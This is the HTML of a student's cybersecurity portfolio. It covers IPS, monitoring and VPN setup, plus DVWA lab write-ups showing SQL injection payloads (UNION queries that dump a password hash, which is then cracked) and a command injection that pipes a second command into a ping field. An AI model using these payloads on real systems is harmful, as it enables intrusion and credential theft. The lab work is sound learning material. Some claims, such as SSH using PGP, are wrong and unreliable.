          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
           </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#09796064496b6c6c626468677a276d6c7f"><span class="__cf_email__" data-cfemail="e191888ca18384848a8c808f92cf858497">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
          <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
          <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
           any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
          <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
